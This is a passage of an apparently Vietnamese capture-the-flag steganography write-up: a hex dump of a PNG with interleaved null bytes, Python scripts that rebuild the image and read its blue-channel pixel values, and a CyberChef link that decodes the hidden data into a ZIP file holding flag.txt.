56 00 70 00 54 00 70 00 E7 00 7C 00 58 00 69 00 29 00 18 00 9D 00 73 00 2D 00 B8 00 BC 00 9F 00 5E 00 10 00 E7 00 D8 00 18 00 82 00 B9 00 D3 00 6B 00 4B 00 26 00 2B 00 E8 00 05 00 71 00 6E 00 7F 00 0F 00 08 00 C6 00 17 00 2B 00 48 00 1A 00 3E 00 2B 00 58 00 B6 00 14 00 24 00 4D 00 BC 00 15 00 B4 00 82 00 C5 00 4B 00 C1 00 38 00 61 00 05 00 23 00 AC 00 60 00 F1 00 52 00 30 00 6E 00 B3 00 82 00 56 00 B0 00 45 00 29 00 38 00 0E 00 96 00 15 00 B4 00 82 00 65 00 4B 00 C1 00 63 00 8F 00 62 00 05 00 8F 00 8B 00 46 00 0A 00 0E 00 63 00 55 00 04 00 C1 00 78 00 B3 00 82 00 11 00 56 00 70 00 3E 00 1F 00 72 00 FB 00 9B 00 44 00 F0 00 D8 00 AB 00 B1 00 82 00 CD 00 15 00 94 00 28 00 89 00 60 00 EC 00 DF 00 F0 00 3E 00 19 00 EF 00 93 00 A9 00 BB 00 4F 00 E6 00 E8 00 F8 00 0D 00 58 00 41 00 2B 00 38 00 2A 00 78 00 5E 00 F9 00 B0 00 81 00 52 00 30 00 3A 00 EA 00 5A 00 70 00 BE 00 9F 00 5E 00 10 00 E7 00 D8 00 30 00 82 00 F9 00 A2 00 35 00 24 00 93 00 15 00 5C 00 85 00 82 00 12 00 25 00 11 00 64 00 AF 00 1D 00 B5 00 82 00 39 00 36 00 AC 00 60 00 BA 00 A6 00 14 00 82 00 F9 00 01 00 56 00 D0 00 0A 00 16 00 2F 00 05 00 49 00 53 00 6E 00 05 00 A7 00 22 00 F7 00 A1 00 85 00 82 00 8B 00 E7 00 7D 00 63 00 08 00 46 00 13 00 56 00 70 00 6D 00 89 00 EB 00 52 00 F0 00 44 00 10 00 1C 00 07 00 CE 00 0A 00 5A 00 C1 00 B2 00 A5 00 60 00 3E 00 91 00 1F 00 60 00 05 00 23 00 9A 00 2A 00 38 00 7C 00 2E 00 82 00 E0 00 78 00 C2 00 0A 00 5A 00 C1 00 1C 00 B9 00 FD 00 CD 00 23 00 98 00 BF 00 58 00 41 00 2B 00 58 00 BC 00 14 00 CC 00 FF 00 37 00 93 00 F7 00 C9 00 78 00 9F 00 4C 00 C5 00 7D 00 32 00 70 00 F4 00 4F 00 A8 00 5A 00 41 00 2B 00 38 00 3B 00 E3 00 A5 00 4A 00 C1 00 E8 00 B4 00 6B 00 C1 00 31 00 BC 00 20 00 CE 00 51 00 04 00 C1 00 A9 00 9B 00 AD 00 60 00 6B 00 05 00 25 00 4A 00 22 00 C8 00 CE 00 1D 00 B5 00 82 00 39 00 8A 00 28 00 38 00 71 00 EF 00 E6 00 11 00 64 00 76 00 E2 00 AD 00 60 00 53 00 05 00 77 00 EE 00 E7 00 4A 00 11 00 8C 00 1B 00 AC 00 E0 00 18 00 B9 00 0F 00 ED 00 14 00 9C 00 9D 00 F7 00 0D 00 23 00 18 00 CD 00 59 00 C1 00 35 00 24 00 EE 00 8A 00 14 00 94 00 28 00 89 00 60 00 7C 00 B1 00 82 00 56 00 B0 00 45 00 29 00 48 00 7A 00 80 00 15 00 8C 00 B0 00 82 00 11 00 05 00 11 00 8C 00 37 00 2B 00 68 00 05 00 73 00 E4 00 F6 00 4B 00 21 00 38 00 75 00 C2 00 0A 00 1E 00 33 00 58 00 13 00 9F 00 0B 00 2A 00 28 00 51 00 12 00 C1 00 D8 00 D7 00 E1 00 7D 00 32 00 DE 00 27 00 93 00 5F 00 B5 00 F6 00 C9 00 1C 00 BD 00 5E 00 B1 00 82 00 56 00 B0 00 51 00 29 00 38 00 26 00 93 00 6B 00 C1 00 08 00 2F 00 88 00 0B 00 22 00 98 00 6F 00 B6 00 82 00 56 00 B0 00 F8 00 82 00 98 00 F3 00 EA 00 A8 00 15 00 CC 00 51 00 50 00 C1 00 14 00 A5 00 10 00 8C 00 A5 00 D5 00 A7 00 01 00 B8 00 07 00 80 00 C7 00 01 00 B8 00 03 00 80 00 7B 00 D3 00 F1 00 FB 00 D3 00 22 00 23 00 97 00 FF 00 67 00 00 00 FF 00 47 00 C4 00 5E 00 10 00 6F 00 63 00 41 00 6C 00 05 00 AD 00 E0 00 82 00 79 00 2F 00 52 00 0A 00 46 00 D3 00 AE 00 05 00 73 00 78 00 41 00 5C 00 B6 00 14 00 1C 00 6F 00 B0 00 82 00 56 00 B0 00 EC 00 82 00 38 00 0E 00 59 00 41 00 2B 00 18 00 51 00 BC 00 14 00 8C 00 2F 00 56 00 D0 00 0A 00 E6 00 F6 00 CB 00 96 00 82 00 F9 00 84 00 15 00 9C 00 1F 00 AC 00 46 00 0A 00 4A 00 94 00 44 00 30 00 FF 00 3B 00 33 00 FE 00 B5 00 60 00 7E 00 F9 00 D7 00 82 00 55 00 F6 00 C9 00 E4 00 B3 00 56 00 D0 00 0A 00 2E 00 38 00 5B 00 A4 00 14 00 8C 00 1F 00 C6 00 B5 00 60 00 84 00 17 00 C4 00 C5 00 4B 00 C1 00 78 00 B3 00 82 00 FB 00 4A 00 88 00 22 00 0A 00 4A 00 94 00 44 00 70 00 79 00 47 00 AD 00 60 00 8E 00 E2 00 0A 00 4A 00 94 00 44 00 30 00 4E 00 5B 00 41 00 2B 00 D8 00 A2 00 14 00 24 00 0D 00 9F 00 15 00 B4 00 82 00 79 00 DE 00 0B 00 22 00 48 00 EA 00 BA 00 15 00 B4 00 82 00 C5 00 4B 00 C1 00 78 00 B3 00 82 00 56 00 B0 00 45 00 29 00 98 00 A7 00 73 00 6D 00 89 00 6B 00 05 00 5D 00 0A 00 EE 00 19 00 C1 00 DD 00 27 00 DE 00 0A 00 16 00 54 00 30 00 8D 00 E7 00 DA 00 12 00 77 00 27 00 04 00 49 00 43 00 3C 00 15 00 56 00 30 00 A2 00 91 00 82 00 3B 00 CF 00 FB 00 4A 00 11 00 8C 00 FD 00 1E 00 DE 00 27 00 13 00 2F 00 EF 00 93 00 A9 00 B8 00 4F 00 26 00 9F 00 B5 00 82 00 56 00 70 00 E2 00 6C 00 C1 00 52 00 90 00 BD 00 26 00 44 00 7E 00 40 00 8B 00 5A 00 30 00 0D 00 F1 00 54 00 B8 00 14 00 8C 00 58 00 05 00 82 00 71 00 C8 00 0A 00 5A 00 C1 00 16 00 0B 00 E2 00 F9 00 8E 00 5A 00 C1 00 1C 00 8D 00 14 00 94 00 28 00 89 00 20 00 17 00 30 00 21 00 AC 00 E0 00 7C 00 42 00 E4 00 F6 00 5D 00 0A 00 46 00 EC 00 19 00 C1 00 F8 00 62 00 05 00 AD 00 60 00 8B 00 52 00 30 00 1E 00 69 00 05 00 AD 00 20 00 69 00 F4 00 CA 00 96 00 82 00 F3 00 13 00 90 00 3B 00 61 00 05 00 F3 00 C4 00 17 00 57 00 50 00 A2 00 24 00 82 00 F9 00 86 00 35 00 24 00 AE 00 15 00 5C 00 85 00 82 00 B3 00 91 00 FB 00 B0 00 31 00 04 00 39 00 AF 00 89 00 B7 00 82 00 C5 00 15 00 4C 00 D7 00 AF 00 21 00 71 00 F7 00 86 00 E0 00 D4 00 CD 00 56 00 30 00 A2 00 A9 00 82 00 E7 00 35 00 EF 00 1B 00 40 00 30 00 F6 00 7E 00 78 00 9F 00 8C 00 F7 00 C9 00 D4 00 DD 00 27 00 03 00 70 00 33 00 00 00 CF 00 63 00 05 00 AD 00 E0 00 A8 00 A0 00 44 00 C9 00 52 00 90 00 9D 00 13 00 22 00 3F 00 A0 00 5D 00 2D 00 38 00 11 00 2E 00 05 00 23 00 56 00 87 00 60 00 9C 00 B6 00 82 00 56 00 B0 00 C5 00 82 00 78 00 3C 00 61 00 05 00 73 00 34 00 55 00 50 00 A2 00 24 00 82 00 9C 00 70 00 42 00 58 00 C1 00 F9 00 84 00 C8 00 ED 00 AF 00 48 00 C1 00 21 00 8A 00 20 00 18 00 27 00 AC 00 60 00 C4 00 1A 00 92 00 69 00 15 00 0A 00 9E 00 70 00 3E 00 BC 00 61 00 08 00 C6 00 E3 00 AD 00 A0 00 15 00 6C 00 51 00 0A 00 8E 00 17 00 E5 00 4E 00 58 00 C1 00 3C 00 F1 00 8D 00 14 00 94 00 28 00 89 00 E0 00 B1 00 AD 00 60 00 05 00 9B 00 2B 00 38 00 DB 00 87 00 0D 00 23 00 C8 00 E2 00 89 00 B7 00 82 00 8D 00 14 00 9C 00 68 00 67 00 F3 00 08 00 E6 00 2F 00 56 00 30 00 C2 00 0A 00 96 00 2D 00 05 00 63 00 1F 00 88 00 F7 00 C9 00 78 00 9F 00 4C 00 DD 00 7D 00 32 00 00 00 B7 00 01 00 F0 00 04 00 56 00 D0 00 0A 00 8E 00 0A 00 4A 00 94 00 2C 00 05 00 39 00 AF 00 84 00 C8 00 0F 00 68 00 5D 00 0B 00 A6 00 70 00 29 00 18 00 B1 00 6A 00 04 00 E3 00 52 00 2B 00 B8 00 24 00 21 00 1A 00 29 00 78 00 5E 00 F9 00 90 00 DB 00 5F 00 29 00 82 00 A4 00 1F 00 3B 00 C2 00 0A 00 5A 00 C1 00 B2 00 A5 00 E0 00 C1 00 50 00 E0 00 9F 00 01 00 0E 00 17 00 82 00 A7 00 87 00 B3 00 A4 00 23 00 E3 00 59 00 FF 00 47 00 C4 00 F9 00 E5 00 05 00 F1 00 FA 00 16 00 C4 00 56 00 D0 00 0A 00 8E 00 0A 00 9E 00 40 00 3E 00 AC 00 A2 00 14 00 8C 00 AE 00 B8 00 16 00 F4 00 82 00 F8 00 11 00 89 00 F2 00 A5 00 E0 00 D8 00 09 00 2B 00 98 00 27 00 BE 00 A9 00 82 00 12 00 25 00 11 00 CC 00 0D 00 59 00 41 00 2B 00 38 00 D5 00 87 00 22 00 08 00 32 00 3B 00 F1 00 56 00 B0 00 A9 00 82 00 29 00 4A 00 21 00 18 00 6F 00 56 00 D0 00 0A 00 B6 00 28 00 05 00 E3 00 22 00 2B 00 68 00 05 00 73 00 94 00 2D 00 05 00 97 00 0C 00 96 00 15 00 6C 00 A7 00 A0 00 44 00 49 00 04 00 97 00 27 00 44 00 7E 00 80 00 15 00 8C 00 28 00 AB 00 E0 00 82 00 B1 00 DA 00 24 00 82 00 53 00 9D 00 B0 00 82 00 11 00 4D 00 15 00 5C 00 9C 00 0F 00 B9 00 FD 00 0D 00 20 00 18 00 5F 00 AC 00 A0 00 15 00 6C 00 51 00 0A 00 C6 00 6E 00 0D 00 EF 00 93 00 F1 00 3E 00 99 00 BA 00 FB 00 64 00 E0 00 E8 00 2F 00 8E 00 58 00 41 00 2B 00 38 00 2A 00 B8 00 A7 00 7C 00 58 00 5D 00 29 00 18 00 DD 00 72 00 2D 00 78 00 AE 00 FD 00 F4 00 82 00 38 00 C7 00 66 00 10 00 CC 00 03 00 61 00 05 00 AD 00 60 00 F1 00 05 00 71 00 BC 00 59 00 41 00 2B 00 38 00 F6 00 A1 00 20 00 82 00 0C 00 13 00 6F 00 05 00 AD 00 60 00 D9 00 52 00 30 00 0E 00 59 00 C1 00 1C 00 56 00 B0 00 6C 00 29 00 18 00 37 00 58 00 41 00 2B 00 D8 00 A2 00 14 00 9C 00 1A 00 2C 00 2B 00 D8 00 5A 00 41 00 89 00 92 00 08 00 CE 00 27 00 44 00 7E 00 80 00 15 00 8C 00 68 00 A1 00 E0 00 C4 00 58 00 6D 00 1E 00 C1 00 DC 00 90 00 15 00 8C 00 B0 00 82 00 F3 00 F9 00 90 00 DB 00 DF 00 18 00 82 00 C7 00 5E 00 77 00 56 00 EA 00 8C 00 61 00 05 00 E7 00 C7 00 6A 00 F3 00 0A 00 A6 00 28 00 85 00 60 00 EC 00 DC 00 F0 00 3E 00 19 00 EF 00 93 00 79 00 01 00 A8 00 B9 00 4F 00 06 00 8E 00 FE 00 81 00 55 00 2B 00 68 00 05 00 47 00 05 00 77 00 C8 00 87 00 55 00 97 00 82 00 D1 00 45 00 D7 00 82 00 4B 00 FA 00 E9 00 05 00 71 00 8E 00 4D 00 22 00 18 00 27 00 D6 00 96 00 4C 00 56 00 D0 00 0B 00 E2 00 DC 00 FE 00 DE 00 10 00 8C 00 43 00 56 00 D0 00 0A 00 B6 00 28 00 05 00 C7 00 1F 00 C6 00 0A 00 5A 00 C1 00 B2 00 A5 00 60 00 9C 00 B6 00 82 00 56 00 B0 00 45 00 29 00 18 00 37 00 5B 00 41 00 2B 00 D8 00 A2 00 14 00 9C 00 1A 00 38 00 2B 00 D8 00 5A 00 41 00 89 00 92 00 08 00 8E 00 27 00 F2 00 03 00 AC 00 60 00 44 00 3B 00 05 00 27 00 3E 00 6F 00 1E 00 C1 00 A9 00 CE 00 59 00 C1 00 D6 00 0A 00 0E 00 91 00 DB 00 DF 00 30 00 82 00 E3 00 0D 00 56 00 D0 00 0A 00 96 00 2D 00 05 00 0F 00 86 00 1D 00 11 00 DE 00 27 00 E3 00 7D 00 32 00 B5 00 F6 00 C9 00 1C 00 5D 00 F9 00 62 00 FE 00 53 00 65 00 05 00 AD 00 60 00 F1 00 52 00 30 00 BA 00 EB 00 5A 00 D0 00 0B 00 E2 00 16 00 A5 00 E0 00 FF 00 00 00 A1 00 19 00 4B 00 C2 00 8F 00 11 00 53 00 08 00 00 00 00 00 00 00 00 00 49 00 45 00 4E 00 44 00 AE 00 42 00 60 00 82" data_list = data.split() result = b'' for i in range(0, len(data_list), 2): result += data_list[i] with open("output.png","wb") as file: file.write(result) ``` Mình được một file ảnh như thế này:  Hmmm, xem ra phải giải mã ảnh này nữa, mình dùng steg, exiftool thì không có gì hết và xem hexdump cũng không có gì bất thường. Mình lên cyberchef xem bit plane thử thì chỉ có màu blue thôi, và những chấm trắng trong ảnh khá đặt biệt nên là mình sẽ xem thử giá trị pixel mà màu blue thử. Script tại đây: ```python import cv2 import numpy as np # Load ảnh bitmap img = cv2.imread("flag.png", cv2.IMREAD_UNCHANGED) # Lấy kích thước ảnh height, width = img.shape[:2] file=open("unicode.txt", "w") #mode a để ghi, # Duyệt qua từng hàng và cột trong ảnh for y in range(height): for x in range(width): # Lấy giá trị mỗi kênh màu của pixel tại vị trí (x,y) b, g, r= img[y, x] red = hex(r) green =hex(g) blue = hex(b) file.write(blue + " ") #file.write(" ") file.write("\n") ``` Đây là mình chỉ lấy màu blue thôi.  Cũng có thể thấy là cách giấu nó giống vs giấu ảnh lúc nãy. Nên là mình extract tiếp. ```python with open("unicode.txt", "r") as file: data=file.read() data=data.split() # print(type(data[1])) res="" for i in range(1, len(data), 2): res+=data[i] + " " print(res) ``` Lên [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')&input=MHg1MCAweDRiIDB4MyAweDQgMHhhIDB4MCAweDkgMHgwIDB4MCAweDAgMHhjIDB4N2UgMHhjNyAweDU2IDB4YmYgMHhmOSAweDI3IDB4YmIgMHgyMCAweDAgMHgwIDB4MCAweDE0IDB4MCAweDAgMHgwIDB4OCAweDAgMHgxYyAweDAgMHg2NiAweDZjIDB4NjEgMHg2NyAweDJlIDB4NzQgMHg3OCAweDc0IDB4NTUgMHg1NCAweDkgMHgwIDB4MyAweDU4IDB4NDQgMHg4MCAweDY0IDB4ODYgMHg0NCAweDgwIDB4NjQgMHg3NSAweDc4IDB4YiAweDAgMHgxIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4ZGEgMHg3MiAweDE1IDB4NzYgMHgzNCAweDllIDB4ZjEgMHg3ZCAweDQ4IDB4ZGUgMHg0MiAweDFhIDB4ZjMgMHg2MyAweDViIDB4YzggMHgzZiAweDc4IDB4YjkgMHg0NSAweDUxIDB4NmUgMHg3YiAweGVmIDB4YTUgMHhmNSAweGQ5IDB4ZWIgMHg4NSAweGQ0IDB4ODEgMHgxNiAweDUwIDB4NGIgMHg3IDB4OCAweGJmIDB4ZjkgMHgyNyAweGJiIDB4MjAgMHgwIDB4MCAweDAgMHgxNCAweDAgMHgwIDB4MCAweDUwIDB4NGIgMHgxIDB4MiAweDFlIDB4MyAweGEgMHgwIDB4OSAweDAgMHgwIDB4MCAweGMgMHg3ZSAweGM3IDB4NTYgMHhiZiAweGY5IDB4MjcgMHhiYiAweDIwIDB4MCAweDAgMHgwIDB4MTQgMHgwIDB4MCAweDAgMHg4IDB4MCAweDE4IDB4MCAweDAgMHgwIDB4MCAweDAgMHgxIDB4MCAweDAgMHgwIDB4YTQgMHg4MSAweDAgMHgwIDB4MCAweDAgMHg2NiAweDZjIDB4NjEgMHg2NyAweDJlIDB4NzQgMHg3OCAweDc0IDB4NTUgMHg1NCAweDUgMHgwIDB4MyAweDU4IDB4NDQgMHg4MCAweDY0IDB4NzUgMHg3OCAweGIgMHgwIDB4MSAweDQgMHhlOCAweDMgMHgwIDB4MCAweDQgMHhlOCAweDMgMHgwIDB4MCAweDUwIDB4NGIgMHg1IDB4NiAweDAgMHgwIDB4MCAweDAgMHgxIDB4MCAweDEgMHgwIDB4NGUgMHgwIDB4MCAweDAgMHg3MiAweDAgMHgwIDB4MCAweDAgMHgwIDB4NTAgMHg0YiAweDMgMHg0IDB4YSAweDAgMHg5IDB4MCAweDAgMHgwIDB4YyAweDdlIDB4YzcgMHg1NiAweGJmIDB4ZjkgMHgyNyAweGJiIDB4MjAgMHgwIDB4MCAweDAgMHgxNCAweDAgMHgwIDB4MCAweDggMHgwIDB4MWMgMHgwIDB4NjYgMHg2YyAweDYxIDB4NjcgMHgyZSAweDc0IDB4NzggMHg3NCAweDU1IDB4NTQgMHg5IDB4MCAweDMgMHg1OCAweDQ0IDB4ODAgMHg2NCAweDg2IDB4NDQgMHg4MCAweDY0IDB4NzUgMHg3OCAweGIgMHgwIDB4MSAweDQgMHhlOCAweDMgMHgwIDB4MCAweDQgMHhlOCAweDMgMHgwIDB4MCAweGRhIDB4NzIgMHgxNSAweDc2IDB4MzQgMHg5ZSAweGYxIDB4N2QgMHg0OCAweGRlIDB4NDIgMHgxYSAweGYzIDB4NjMgMHg1YiAweGM4IDB4M2YgMHg3OCAweGI5IDB4NDUgMHg1MSAweDZlIDB4N2IgMHhlZiAweGE1IDB4ZjUgMHhkOSAweGViIDB4ODUgMHhkNCAweDgxIDB4MTYgMHg1MCAweDRiIDB4NyAweDggMHhiZiAweGY5IDB4MjcgMHhiYiAweDIwIDB4MCAweDAgMHgwIDB4MTQgMHgwIDB4MCAweDAgMHg1MCAweDRiIDB4MSAweDIgMHgxZSAweDMgMHhhIDB4MCAweDkgMHgwIDB4MCAweDAgMHhjIDB4N2UgMHhjNyAweDU2IDB4YmYgMHhmOSAweDI3IDB4YmIgMHgyMCAweDAgMHgwIDB4MCAweDE0IDB4MCAweDAgMHgwIDB4OCAweDAgMHgxOCAweDAgMHgwIDB4MCAweDAgMHgwIDB4MSAweDAgMHgwIDB4MCAweGE0IDB4ODEgMHgwIDB4MCAweDAgMHgwIDB4NjYgMHg2YyAweDYxIDB4NjcgMHgyZSAweDc0IDB4NzggMHg3NCAweDU1IDB4NTQgMHg1IDB4MCAweDMgMHg1OCAweDQ0IDB4ODAgMHg2NCAweDc1IDB4NzggMHhiIDB4MCAweDEgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHg1MCAweDRiIDB4NSAweDYgMHgwIDB4MCAweDAgMHgwIDB4MSAweDAgMHgxIDB4MCAweDRlIDB4MCAweDAgMHgwIDB4NzIgMHgwIDB4MCAweDAgMHgwIDB4MCAweDUwIDB4NGIgMHgzIDB4NCAweGEgMHgwIDB4OSAweDAgMHgwIDB4MCAweGMgMHg3ZSAweGM3IDB4NTYgMHhiZiAweGY5IDB4MjcgMHhiYiAweDIwIDB4MCAweDAgMHgwIDB4MTQgMHgwIDB4MCAweDAgMHg4IDB4MCAweDFjIDB4MCAweDY2IDB4NmMgMHg2MSAweDY3IDB4MmUgMHg3NCAweDc4IDB4NzQgMHg1NSAweDU0IDB4OSAweDAgMHgzIDB4NTggMHg0NCAweDgwIDB4NjQgMHg4NiAweDQ0IDB4ODAgMHg2NCAweDc1IDB4NzggMHhiIDB4MCAweDEgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHhkYSAweDcyIDB4MTUgMHg3NiAweDM0IDB4OWUgMHhmMSAweDdkIDB4NDggMHhkZSAweDQyIDB4MWEgMHhmMyAweDYzIDB4NWIgMHhjOCAweDNmIDB4NzggMHhiOSAweDQ1IDB4NTEgMHg2ZSAweDdiIDB4ZWYgMHhhNSAweGY1IDB4ZDkgMHhlYiAweDg1IDB4ZDQgMHg4MSAweDE2IDB4NTAgMHg0YiAweDcgMHg4IDB4YmYgMHhmOSAweDI3IDB4YmIgMHgyMCAweDAgMHgwIDB4MCAweDE0IDB4MCAweDAgMHgwIDB4NTAgMHg0YiAweDEgMHgyIDB4MWUgMHgzIDB4YSAweDAgMHg5IDB4MCAweDAgMHgwIDB4YyAweDdlIDB4YzcgMHg1NiAweGJmIDB4ZjkgMHgyNyAweGJiIDB4MjAgMHgwIDB4MCAweDAgMHgxNCAweDAgMHgwIDB4MCAweDggMHgwIDB4MTggMHgwIDB4MCAweDAgMHgwIDB4MCAweDEgMHgwIDB4MCAweDAgMHhhNCAweDgxIDB4MCAweDAgMHgwIDB4MCAweDY2IDB4NmMgMHg2MSAweDY3IDB4MmUgMHg3NCAweDc4IDB4NzQgMHg1NSAweDU0IDB4NSAweDAgMHgzIDB4NTggMHg0NCAweDgwIDB4NjQgMHg3NSAweDc4IDB4YiAweDAgMHgxIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4NTAgMHg0YiAweDUgMHg2IDB4MCAweDAgMHgwIDB4MCAweDEgMHgwIDB4MSAweDAgMHg0ZSAweDAgMHgwIDB4MCAweDcyIDB4MCAweDAgMHgwIDB4MCAweDAgMHg1MCAweDRiIDB4MyAweDQgMHhhIDB4MCAweDkgMHgwIDB4MCAweDAgMHhjIDB4N2UgMHhjNyAweDU2IDB4YmYgMHhmOSAweDI3IDB4YmIgMHgyMCAweDAgMHgwIDB4MCAweDE0IDB4MCAweDAgMHgwIDB4OCAweDAgMHgxYyAweDAgMHg2NiAweDZjIDB4NjEgMHg2NyAweDJlIDB4NzQgMHg3OCAweDc0IDB4NTUgMHg1NCAweDkgMHgwIDB4MyAweDU4IDB4NDQgMHg4MCAweDY0IDB4ODYgMHg0NCAweDgwIDB4NjQgMHg3NSAweDc4IDB4YiAweDAgMHgxIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4ZGEgMHg3MiAweDE1IDB4NzYgMHgzNCAweDllIDB4ZjEgMHg3ZCAweDQ4IDB4ZGUgMHg0MiAweDFhIDB4ZjMgMHg2MyAweDViIDB4YzggMHgzZiAweDc4IDB4YjkgMHg0NSAweDUxIDB4NmUgMHg3YiAweGVmIDB4YTUgMHhmNSAweGQ5IDB4ZWIgMHg4NSAweGQ0IDB4ODEgMHgxNiAweDUwIDB4NGIgMHg3IDB4OCAweGJmIDB4ZjkgMHgyNyAweGJiIDB4MjAgMHgwIDB4MCAweDAgMHgxNCAweDAgMHgwIDB4MCAweDUwIDB4NGIgMHgxIDB4MiAweDFlIDB4MyAweGEgMHgwIDB4OSAweDAgMHgwIDB4MCAweGMgMHg3ZSAweGM3IDB4NTYgMHhiZiAweGY5IDB4MjcgMHhiYiAweDIwIDB4MCAweDAgMHgwIDB4MTQgMHgwIDB4MCAweDAgMHg4IDB4MCAweDE4IDB4MCAweDAgMHgwIDB4MCAweDAgMHgxIDB4MCAweDAgMHgwIDB4YTQgMHg4MSAweDAgMHgwIDB4MCAweDAgMHg2NiAweDZjIDB4NjEgMHg2NyAweDJlIDB4NzQgMHg3OCAweDc0IDB4NTUgMHg1NCAweDUgMHgwIDB4MyAweDU4IDB4NDQgMHg4MCAweDY0IDB4NzUgMHg3OCAweGIgMHgwIDB4MSAweDQgMHhlOCAweDMgMHgwIDB4MCAweDQgMHhlOCAweDMgMHgwIDB4MCAweDUwIDB4NGIgMHg1IDB4NiAweDAgMHgwIDB4MCAweDAgMHgxIDB4MCAweDEgMHgwIDB4NGUgMHgwIDB4MCAweDAgMHg3MiAweDAgMHgwIDB4MCAweDAgMHgwIDB4NTAgMHg0YiAweDMgMHg0IDB4YSAweDAgMHg5IDB4MCAweDAgMHgwIDB4YyAweDdlIDB4YzcgMHg1NiAweGJmIDB4ZjkgMHgyNyAweGJiIDB4MjAgMHgwIDB4MCAweDAgMHgxNCAweDAgMHgwIDB4MCAweDggMHgwIDB4MWMgMHgwIDB4NjYgMHg2YyAweDYxIDB4NjcgMHgyZSAweDc0IDB4NzggMHg3NCAweDU1IDB4NTQgMHg5IDB4MCAweDMgMHg1OCAweDQ0IDB4ODAgMHg2NCAweDg2IDB4NDQgMHg4MCAweDY0IDB4NzUgMHg3OCAweGIgMHgwIDB4MSAweDQgMHhlOCAweDMgMHgwIDB4MCAweDQgMHhlOCAweDMgMHgwIDB4MCAweGRhIDB4NzIgMHgxNSAweDc2IDB4MzQgMHg5ZSAweGYxIDB4N2QgMHg0OCAweGRlIDB4NDIgMHgxYSAweGYzIDB4NjMgMHg1YiAweGM4IDB4M2YgMHg3OCAweGI5IDB4NDUgMHg1MSAweDZlIDB4N2IgMHhlZiAweGE1IDB4ZjUgMHhkOSAweGViIDB4ODUgMHhkNCAweDgxIDB4MTYgMHg1MCAweDRiIDB4NyAweDggMHhiZiAweGY5IDB4MjcgMHhiYiAweDIwIDB4MCAweDAgMHgwIDB4MTQgMHgwIDB4MCAweDAgMHg1MCAweDRiIDB4MSAweDIgMHgxZSAweDMgMHhhIDB4MCAweDkgMHgwIDB4MCAweDAgMHhjIDB4N2UgMHhjNyAweDU2IDB4YmYgMHhmOSAweDI3IDB4YmIgMHgyMCAweDAgMHgwIDB4MCAweDE0IDB4MCAweDAgMHgwIDB4OCAweDAgMHgxOCAweDAgMHgwIDB4MCAweDAgMHgwIDB4MSAweDAgMHgwIDB4MCAweGE0IDB4ODEgMHgwIDB4MCAweDAgMHgwIDB4NjYgMHg2YyAweDYxIDB4NjcgMHgyZSAweDc0IDB4NzggMHg3NCAweDU1IDB4NTQgMHg1IDB4MCAweDMgMHg1OCAweDQ0IDB4ODAgMHg2NCAweDc1IDB4NzggMHhiIDB4MCAweDEgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHg1MCAweDRiIDB4NSAweDYgMHgwIDB4MCAweDAgMHgwIDB4MSAweDAgMHgxIDB4MCAweDRlIDB4MCAweDAgMHgwIDB4NzIgMHgwIDB4MCAweDAgMHgwIDB4MCAweDUwIDB4NGIgMHgzIDB4NCAweGEgMHgwIDB4OSAweDAgMHgwIDB4MCAweGMgMHg3ZSAweGM3IDB4NTYgMHhiZiAweGY5IDB4MjcgMHhiYiAweDIwIDB4MCAweDAgMHgwIDB4MTQgMHgwIDB4MCAweDAgMHg4IDB4MCAweDFjIDB4MCAweDY2IDB4NmMgMHg2MSAweDY3IDB4MmUgMHg3NCAweDc4IDB4NzQgMHg1NSAweDU0IDB4OSAweDAgMHgzIDB4NTggMHg0NCAweDgwIDB4NjQgMHg4NiAweDQ0IDB4ODAgMHg2NCAweDc1IDB4NzggMHhiIDB4MCAweDEgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHhkYSAweDcyIDB4MTUgMHg3NiAweDM0IDB4OWUgMHhmMSAweDdkIDB4NDggMHhkZSAweDQyIDB4MWEgMHhmMyAweDYzIDB4NWIgMHhjOCAweDNmIDB4NzggMHhiOSAweDQ1IDB4NTEgMHg2ZSAweDdiIDB4ZWYgMHhhNSAweGY1IDB4ZDkgMHhlYiAweDg1IDB4ZDQgMHg4MSAweDE2IDB4NTAgMHg0YiAweDcgMHg4IDB4YmYgMHhmOSAweDI3IDB4YmIgMHgyMCAweDAgMHgwIDB4MCAweDE0IDB4MCAweDAgMHgwIDB4NTAgMHg0YiAweDEgMHgyIDB4MWUgMHgzIDB4YSAweDAgMHg5IDB4MCAweDAgMHgwIDB4YyAweDdlIDB4YzcgMHg1NiAweGJmIDB4ZjkgMHgyNyAweGJiIDB4MjAgMHgwIDB4MCAweDAgMHgxNCAweDAgMHgwIDB4MCAweDggMHgwIDB4MTggMHgwIDB4MCAweDAgMHgwIDB4MCAweDEgMHgwIDB4MCAweDAgMHhhNCAweDgxIDB4MCAweDAgMHgwIDB4MCAweDY2IDB4NmMgMHg2MSAweDY3IDB4MmUgMHg3NCAweDc4IDB4NzQgMHg1NSAweDU0IDB4NSAweDAgMHgzIDB4NTggMHg0NCAweDgwIDB4NjQgMHg3NSAweDc4IDB4YiAweDAgMHgxIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4NTAgMHg0YiAweDUgMHg2IDB4MCAweDAgMHgwIDB4MCAweDEgMHgwIDB4MSAweDAgMHg0ZSAweDAgMHgwIDB4MCAweDcyIDB4MCAweDAgMHgwIDB4MCAweDAgMHg1MCAweDRiIDB4MyAweDQgMHhhIDB4MCAweDkgMHgwIDB4MCAweDAgMHhjIDB4N2UgMHhjNyAweDU2IDB4YmYgMHhmOSAweDI3IDB4YmIgMHgyMCAweDAgMHgwIDB4MCAweDE0IDB4MCAweDAgMHgwIDB4OCAweDAgMHgxYyAweDAgMHg2NiAweDZjIDB4NjEgMHg2NyAweDJlIDB4NzQgMHg3OCAweDc0IDB4NTUgMHg1NCAweDkgMHgwIDB4MyAweDU4IDB4NDQgMHg4MCAweDY0IDB4ODYgMHg0NCAweDgwIDB